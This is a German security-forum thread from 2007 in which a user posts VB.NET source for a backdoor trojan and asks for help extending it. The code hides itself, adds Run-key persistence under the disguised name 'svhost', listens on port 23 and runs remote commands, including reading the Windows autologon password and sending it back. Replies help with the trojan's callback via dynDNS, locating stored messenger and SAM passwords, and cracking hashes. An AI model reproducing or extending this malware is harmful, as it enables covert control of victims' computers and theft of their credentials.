Willkommen bei Network & Security     remoteshell-security.com
Partnerseiten
login.php?sid=313b20cfa2c10410ae420a3067573d7b profile.php?mode=register&sid=313b20cfa2c10410ae420a3067573d7b faq.php?sid=313b20cfa2c10410ae420a3067573d7b memberlist.php?sid=313b20cfa2c10410ae420a3067573d7b search.php?sid=313b20cfa2c10410ae420a3067573d7b index.php?sid=313b20cfa2c10410ae420a3067573d7b

Foren-Übersicht » Programmierung » [VB.NET] Fragen
Neues Thema eröffnen  Neue Antwort erstellen Vorheriges Thema anzeigen :: Nächstes Thema anzeigen 
[VB.NET] Fragen
BeitragVerfasst am: 15.01.2007 15:54 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beiträge: 80
Wohnort: /desktop/papierkorb




1. Weiß einer wie ich einen Wert auslese? ich will nähmlich das psw des aktuellen users auslesen

2. wisst ihr wo die psws von icq, msn usw gespeichert werden?
3. Wie kann ich die Maus (, Tastatur) blockieren?
wenn ich die Maus so blocke:
Code:

Declare Function ShowCursor Lib "user32" (ByVal _bShow As Long) As Long

Windows.Forms.Cursor.Hide()


kommt ein fehler

ich hoffe ihr könnt mir helfen

cya Kaito

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 25.01.2007 17:43 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beiträge: 80
Wohnort: /desktop/papierkorb




hi
es währe schon schön wenn ich mal eine antwort erhalte^^

hier der vorläufige code (mit ein paar fehlern):

Code:
Option Explicit On
Imports System.net



Public Class Form1

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Dim path = My.Application.Info.DirectoryPath.ToString()
        Dim appl = My.Application.Info.AssemblyName & ".exe"
        Dim regkey = path & "\" & appl
     

       My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "svhost", regkey)
        My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "svhost", regkey)
        Me.Visible = False

        Dim objServer As New Sockets.TcpListener(IPAddress.Any, 23) 'Server auf Ip, Port setzen
        objServer.Start() 'Server Starten

        Do
            Threading.Thread.Sleep(100) 'auf Client warten
        Loop Until objServer.Pending

        Dim objClient As Sockets.TcpClient = objServer.AcceptTcpClient
        Dim objStream As Sockets.NetworkStream = objClient.GetStream

        Dim data As Byte() = System.Text.Encoding.ASCII.GetBytes("Befehl: ")
        objStream.Write(data, 0, data.Length)




        Dim input(0) As Byte


        Do

            Dim blnEnter As Boolean = False
            Dim strb As New System.Text.StringBuilder

            Do
                objStream.Read(input, 0, 1)

                If input(0) = 10 Then
                    blnEnter = True
                ElseIf input(0) <> 13 Then 'enter besteht aus einer 10 (line feed) und einer 13 (carriage return) (sinnloserweise finde ich) die 13 wird hier ignoriert weggespült
                    strb.Append(System.Text.Encoding.ASCII.GetString(input))
                End If

            Loop Until blnEnter


            Dim output As String = strb.ToString
            'MsgBox(output)
            If output.StartsWith("MSG") Then
                MsgBox(output.Substring(4))
            End If

            Select Case output
                Case "SHUTDOWN"
                    Try
                        Process.Start("shutdown -s -f -t 3")
                    Catch ex As Exception
                        Process.Start("shutdown -s -f")
                    End Try

                Case "RESTART"
                    Try
                        Process.Start("shutdown -r -f -t 3")
                    Catch ex As Exception
                        Process.Start("shutdown -r -f")
                    End Try
                Case "FEHLER"
                    Dim i
                    For i = 1 To 1000
                        MsgBox("Schwerer Ausnahmefehler: x0723D6F5S7 & x0056F52f", MsgBoxStyle.Critical)
                    Next
                Case "BEEP"
                    Dim i
                    For i = 1 To 1000
                        My.Computer.Audio.PlaySystemSound(Media.SystemSounds.Beep)
                        Threading.Thread.Sleep(300)
                    Next
                Case "PSW"
                    Dim pswcomp = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", "DefaultPassword", "")
                    Dim psw As Byte() = System.Text.Encoding.ASCII.GetBytes("PSW des Computers: " & pswcomp)
                    objStream.Write(psw, 0, psw.Length)

             
            End Select

        Loop
    End Sub



End Class



weitere funktionen bei denen ich noch nich herraus gefunden habe wie ich das hinbiegen soll ist:

- CD Tray öffnen und schließen
- Blue Screen an/aus (also eigendliche alles Blockieren tastatur und maus ausblenden und dann ein form maximieren und blau färben - so würd ichs machen)
- Durche den Router (das weiß ich schon wie ichs mach also vom opfer connecten an meine ip )
- Firewalls killen (ich hätte mir vorgestellt: eine liste mit allen bekannten firewalls und dann die prozesse killen)
- Programm in den Autostartordner kopieren (weiß die funktion nich^^)
- Updaten (das is das wichtigste - zuerst wollt ichs mit der vb internen update funktion machen aber das is nich sooo gut)
- Passwörter auslesen: das computer psw les ich aus der registry aus:

Code:
Dim pswcomp = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", "DefaultPassword", "")

aber in der schule geht das nicht weil wir da auf die registry nich zugreifen können
- MSN, ICQ, Aim und sonstige passwörter ich find einfach net raus wo die gespeichert werden
- das das Programm nach raus connecten kann braucht es meine ip also -> also der client geht auf einen ftp server und schreibt in eine ip.txt meine ip, der server wiederum liest sie aus und connectet. wenn der client
runterfährt wird die ip.txt gelöscht das sagt dem server dann das er nicht connecten kann aber wenn ich das mit

Code:

 My.Computer.Network.DownloadFile("http://htnrevision.ht.funpic.de/", "ip.txt", "htnrevision", "??????")


mache kommt eine ip.txt auf meine pc aber da ist nix drinn

das kann er schon alles(nich allzuviel):

- Beliebige MSg boxen senden
- Runterfahren
- Restarten
- Fehlermeldungen anzeigen (1000^^)
- Beeps ausgeben (1000^^)
- PSW auslesen

also ich hoffe ihr könnt mir meine Fragen beantworten

cya Kaito


Zuletzt bearbeitet von Kaito am 11.02.2007 12:59, insgesamt einmal bearbeitet

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 25.01.2007 18:03 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beiträge: 569
Wohnort: /proc




Hi,

ich kann zwar kein VB.NET oder vergleichbares aber wenn du z.B. dienste einer Firewall oder einer Antivierensoftware abschiesen möchtes, brauchst du auch die entsprechenden Rechte.
Am besten wäre es wenn du in dir einige Schwächen des Eventhandling von Windows zu nutze machst. Ob das mit VB realisierbar ist, weiß ich nicht.
Ganz interessant sollte für dich folgendes schon älteres Video sein:
http://ulm.ccc.de/ChaosSeminar/2004/12_Personal_Firewalls?highlight=%28ChaosSeminar%2F2004%29

Aber es muss gesagt sein das die Vorträger nicht umbedingt kompetent erscheinen (wieviele bits hatte gleich noch eine IP ?).

Beachten solltes du noch, das es einem Benutzer auch nicht gestattet sein kann, den Rechner herunterzufahren zu können.

mfg duddits

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
BeitragVerfasst am: 25.01.2007 18:22 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beiträge: 357
Wohnort: /dev/RL




Mein Tipp: Leg dir ne dynDNS zu und lass den Trojaner auf die connecten... Dann hast du das Problem mit der ip.txt nicht mehr...

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 25.01.2007 21:02 Antworten mit Zitat
Lukas
Anmeldedatum: 31.12.2005
Beiträge: 257
Wohnort: Wien




Hi, Duddits!

Das ist ein guter Link, den kenn ich schon aber leider sind da viele Sachen nicht mehr aktuell.

Autoklicker, und httpshell sind noch möglich aber der Rest dürfte nicht mehr möglich sein.

@Kaito:

Konzentrier dich nicht nur auf die Prozesse Wink, SPF wird zB auch nicht im TM angezeigt.

Mfg
Benutzer-Profile anzeigen Private Nachricht senden
BeitragVerfasst am: 26.01.2007 14:32 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beiträge: 80
Wohnort: /desktop/papierkorb




Danke für die Antworten.

das Video ist sehr interresant habs aber nicht ganz angeschaut war mir zu lange

@pharaoh ich hab ne dyndns kaito.selfip.net

@lukas ich versteh nicht ganz was du mit spf meinst

cu Kaito

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 26.01.2007 14:41 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beiträge: 357
Wohnort: /dev/RL




SPF is anscheinend ein Programm, das nicht als Task, sondern als Service läuft

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 26.01.2007 14:46 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beiträge: 80
Wohnort: /desktop/papierkorb




ich weiß schon was es ist^^
sygatepersonalfirewall

cu

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 28.01.2007 18:08 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beiträge: 80
Wohnort: /desktop/papierkorb




hi

wisst ihr vielleicht wie das msn passwort verschlüsselt ist?
ich hatte mal eine vbs datei die das entschlüsseln konnte aber ich find sie nichtmehr -.-

und wisst ihr wo das icq psw gespeichert wird und ob das verschlüsselt wird?

das passwort vom computer lies ich aus der registry raus aus:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword
ich weiß aber nich ob das stimmt weil in der schule gehts nicht.

cya

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 28.01.2007 18:23 Antworten mit Zitat
4lx
Anmeldedatum: 02.01.2006
Beiträge: 369
Wohnort: /offtopic




Hi,
ich habe Trillian, da wird das Passwort verschlüsselt in folgender Datei gespeichert:
~Trillian\users\default\aim.ini
Von ICQ habe ich leider keine Ahnung.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword
existiert bei mir nicht.^^
Wird der Eintrag vielleicht nur bei Autologin gespeichert?
Überlicherwese findest du die Passwörter aber in:
C:\WINDOWS\system32\config\SAM

_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon

"Terrorismus ist die Zerstörung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhäusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID ICQ-Nummer
BeitragVerfasst am: 28.01.2007 18:26 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beiträge: 782
Wohnort: Engelskirchen




Ja, so ist es:
http://www.winstuff.de/show_registry.html?sid=43

Du solltest bedenken, dass die wenigsten Benutzer den Autologon benutzen, weil sie den Computer in der Familie verwenden und jeder seinen eigenen Benutzer hat. Meistens haben jedoch trotzdem alle Administratorrechte.
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 28.01.2007 18:33 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beiträge: 80
Wohnort: /desktop/papierkorb




ich hab aber kein autologin aktiviert^^

egal aber die sam ist doch verschlüsselt oder?

der lukas hat mir ein programm gezeigt lsadump2 das funkt aber nicht
jetzt hab ich mir gedacht das man vielleicht able dafür verwenden könnte?

wo das msn psw gespeichert wird weiß ich schon aber wie es verschlüsselt wird ist die frage

cya Kaito

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 28.01.2007 18:51 Antworten mit Zitat
4lx
Anmeldedatum: 02.01.2006
Beiträge: 369
Wohnort: /offtopic




Probier's doch aus. Smile

Du hast ja wahrscheinlich MSN, also setzt doch dein Passwort auf einen Wert, der höchtwahrscheinlich in einer Rainbowtable ist, z.B. "test", und zähle dann die Zeichen des Hashes um eine Verschlüsselung in die engere Auswahl ziehen zu können, dann packste das in die Suchmaschine der erwähnten Datebank für Rainbowtables und wenn dann dein gewähltes Passwort wieder herauskommt, weißte ja was es ist. Razz

_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon

"Terrorismus ist die Zerstörung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhäusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID ICQ-Nummer
BeitragVerfasst am: 28.01.2007 19:33 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beiträge: 80
Wohnort: /desktop/papierkorb




ich hab schon etwas gefunden^^

http://www.nirsoft.net/password_recovery_tools.html

funkt prima

cya Kaito

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
[VB.NET] Fragen
Foren-Übersicht » Programmierung
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Alle Zeiten sind GMT + 1 Stunde  
Seite 1 von 1  

  
  
 Neues Thema eröffnen  Neue Antwort erstellen  


Forensicherheit

Powered by phpBB © 2001-2004 phpBB Group
phpBB Style by Vjacheslav Trushkin
Deutsche Übersetzung von phpBB.de


remoteshell-security.com | Partner | Boardregeln | Impressum